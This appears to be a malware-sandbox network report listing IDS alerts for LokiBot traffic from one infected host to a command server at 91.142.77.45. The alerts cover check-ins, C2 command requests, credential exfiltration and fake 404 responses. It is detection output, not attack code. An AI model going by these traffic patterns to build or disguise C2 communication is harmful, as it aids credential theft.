                                      192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409TCP2025483ET TROJAN LokiBot Fake 404 Response804973291.142.77.45192.168.2.6
                                      192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5286553192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016TCP2025483ET TROJAN LokiBot Fake 404 Response804972991.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964TCP2025483ET TROJAN LokiBot Fake 404 Response804972191.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575TCP2025483ET TROJAN LokiBot Fake 404 Response804972391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6386353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6253853192.168.2.68.8.8.8
                                      192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5859553192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.691.142.77.45
                                      192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5595653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321TCP2025483ET TROJAN LokiBot Fake 404 Response804973791.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076TCP2025483ET TROJAN LokiBot Fake 404 Response804974091.142.77.45192.168.2.6
                                      192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5908253192.168.2.68.8.8.8
                                      192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5153053192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6003253192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167TCP2025483ET TROJAN LokiBot Fake 404 Response804971591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288TCP2025483ET TROJAN LokiBot Fake 404 Response804972691.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5891753192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237TCP2825766ETPRO TROJAN LokiBot Checkin M24971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881TCP2025483ET TROJAN LokiBot Fake 404 Response804974391.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667TCP2025483ET TROJAN LokiBot Fake 404 Response804974591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643TCP2025483ET TROJAN LokiBot Fake 404 Response804974191.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6322953192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4978653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5612353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497TCP2825766ETPRO TROJAN LokiBot Checkin M24971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566TCP2825766ETPRO TROJAN LokiBot Checkin M24970980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093TCP2825766ETPRO TROJAN LokiBot Checkin M24970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442TCP2025483ET TROJAN LokiBot Fake 404 Response804971791.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.691.142.77.45
                                      192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6504453192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667TCP2025483ET TROJAN LokiBot Fake 404 Response804971391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5608653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036TCP2025483ET TROJAN LokiBot Fake 404 Response804972891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245TCP2025483ET TROJAN LokiBot Fake 404 Response804972091.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605TCP2025483ET TROJAN LokiBot Fake 404 Response804972491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.691.142.77.45
                                      192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5490353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5654753192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.691.142.77.45
                                      192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5950453192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635TCP2025483ET TROJAN LokiBot Fake 404 Response804972791.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262TCP2025483ET TROJAN LokiBot Fake 404 Response804973691.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070TCP2025483ET TROJAN LokiBot Fake 404 Response804973891.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112TCP2825766ETPRO TROJAN LokiBot Checkin M24973680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.691.142.77.45
                                      192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5255653192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064TCP2825766ETPRO TROJAN LokiBot Checkin M24970880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542TCP2025483ET TROJAN LokiBot Fake 404 Response804973091.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748TCP2025483ET TROJAN LokiBot Fake 404 Response804972591.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6252053192.168.2.68.8.8.8
                                      192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5732253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314TCP2025483ET TROJAN LokiBot Fake 404 Response804974491.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826TCP2025483ET TROJAN LokiBot Fake 404 Response804971991.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954TCP2025483ET TROJAN LokiBot Fake 404 Response804970891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802TCP2025483ET TROJAN LokiBot Fake 404 Response804973391.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561TCP2025483ET TROJAN LokiBot Fake 404 Response804971191.142.77.45192.168.2.6
                                      192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5207953192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.691.142.77.45
                                      192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6183353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286TCP2825766ETPRO TROJAN LokiBot Checkin M24971180192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996TCP2025483ET TROJAN LokiBot Fake 404 Response804972291.142.77.45192.168.2.6
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 3, 2022 12:30:06.648422003 CET4970680192.168.2.691.142.77.45
